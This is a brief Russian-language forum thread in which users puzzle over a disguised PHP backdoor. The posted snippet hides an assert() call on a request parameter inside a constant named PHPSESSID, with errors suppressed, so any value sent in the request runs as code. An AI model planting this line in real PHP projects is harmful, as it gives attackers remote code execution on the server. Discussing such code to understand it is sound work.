|
|
|
|
|
для: cheops
(14.05.2012 в 08:40)
| | Замаскирован ) | |
|
|
|
|
|
|
|
для: lgar
(13.05.2012 в 20:53)
| | Ммм... а вредоносный код где? | |
|
|
|
|
|
|
|
<?
define('PHPSESSID',@assert($_REQUEST['PHPSESSID']))
or phpinfo();
?>
|
Интересная вещь, совершенно непонятно, как это чудо работает. Определяем константу PHPSESSID, глушим ошибки (@), assert() проверяет заданное утверждение, $_REQUEST - массив, в котором можно передавать GET/POST-данные. Вопрос только, что берет? Значение в адресной строке браузера куда передает?
Есть такой массив $_REQUEST['PHPSESSID'] или можно было по-любому задать $_REQUEST['Exmpl']? | |
|
|
|
|